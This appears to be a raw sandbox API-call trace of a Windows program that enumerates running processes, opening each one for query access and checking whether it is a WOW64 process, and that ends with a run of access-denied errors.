	[0127.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0127.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0127.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0127.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0127.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0127.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0127.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0127.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0127.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0127.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0127.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0127.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0127.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0127.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0127.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0127.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x2dc
	[0127.733] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.733] CloseHandle (hObject=0x2dc) returned 1
	[0127.733] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5970, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0127.733] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0127.734] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0127.734] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x2dc
	[0127.734] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.734] CloseHandle (hObject=0x2dc) returned 1
	[0127.734] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d128, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0127.734] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0127.734] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2dc
	[0127.735] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.735] CloseHandle (hObject=0x2dc) returned 1
	[0127.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x2dc
	[0127.735] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.735] CloseHandle (hObject=0x2dc) returned 1
	[0127.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x2dc
	[0127.736] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.736] CloseHandle (hObject=0x2dc) returned 1
	[0127.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5c10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x2dc
	[0127.736] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.736] CloseHandle (hObject=0x2dc) returned 1
	[0127.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0127.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x2dc
	[0127.736] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.736] CloseHandle (hObject=0x2dc) returned 1
	[0127.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.737] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x2dc
	[0127.737] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.737] CloseHandle (hObject=0x2dc) returned 1
	[0127.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.737] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0127.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b5b38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.738] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x2dc
	[0127.738] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.738] CloseHandle (hObject=0x2dc) returned 1
	[0127.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.738] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x2dc
	[0127.738] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.738] CloseHandle (hObject=0x2dc) returned 1
	[0127.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.738] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x2dc
	[0127.739] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.739] CloseHandle (hObject=0x2dc) returned 1
	[0127.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0127.739] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x2dc
	[0127.739] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.739] CloseHandle (hObject=0x2dc) returned 1
	[0127.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d5f8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0127.739] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x2dc
	[0127.739] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.739] CloseHandle (hObject=0x2dc) returned 1
	[0127.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0127.740] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x2dc
	[0127.740] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.740] CloseHandle (hObject=0x2dc) returned 1
	[0127.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b98c0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0127.740] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x2dc
	[0127.740] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.740] CloseHandle (hObject=0x2dc) returned 1
	[0127.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0127.741] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x2dc
	[0127.741] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.741] CloseHandle (hObject=0x2dc) returned 1
	[0127.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.741] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x2dc
	[0127.741] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.741] CloseHandle (hObject=0x2dc) returned 1
	[0127.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.741] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x2dc
	[0127.741] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.742] CloseHandle (hObject=0x2dc) returned 1
	[0127.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0127.742] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x2dc
	[0127.742] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.742] CloseHandle (hObject=0x2dc) returned 1
	[0127.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d1a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0127.742] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x2dc
	[0127.742] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.742] CloseHandle (hObject=0x2dc) returned 1
	[0127.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5a48, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.743] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x2dc
	[0127.743] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.743] CloseHandle (hObject=0x2dc) returned 1
	[0127.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.743] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x2dc
	[0127.743] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.743] CloseHandle (hObject=0x2dc) returned 1
	[0127.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9af0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0127.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x2dc
	[0127.744] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.744] CloseHandle (hObject=0x2dc) returned 1
	[0127.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x2dc
	[0127.744] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.744] CloseHandle (hObject=0x2dc) returned 1
	[0127.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5c10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0127.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x2dc
	[0127.745] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.745] CloseHandle (hObject=0x2dc) returned 1
	[0127.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0127.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x2dc
	[0127.745] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.745] CloseHandle (hObject=0x2dc) returned 1
	[0127.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b59e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x2dc
	[0127.745] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.746] CloseHandle (hObject=0x2dc) returned 1
	[0127.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d1a8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0127.746] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x2dc
	[0127.746] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.746] CloseHandle (hObject=0x2dc) returned 1
	[0127.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b9af0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0127.746] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x2dc
	[0127.746] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.746] CloseHandle (hObject=0x2dc) returned 1
	[0127.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0127.747] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2dc
	[0127.747] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.747] CloseHandle (hObject=0x2dc) returned 1
	[0127.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.747] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2dc
	[0127.747] GetLastError () returned 0x5
	[0127.747] GetLastError () returned 0x5
	[0127.747] GetLastError () returned 0x5
	[0127.747] GetLastError () returned 0x5
	[0127.747] GetLastError () returned 0x5
	[0127.747] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.748] GetLastError () returned 0x5
	[0127.749] GetLastError () returned 0x5
	[0127.749] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0127.749] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0127.749] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
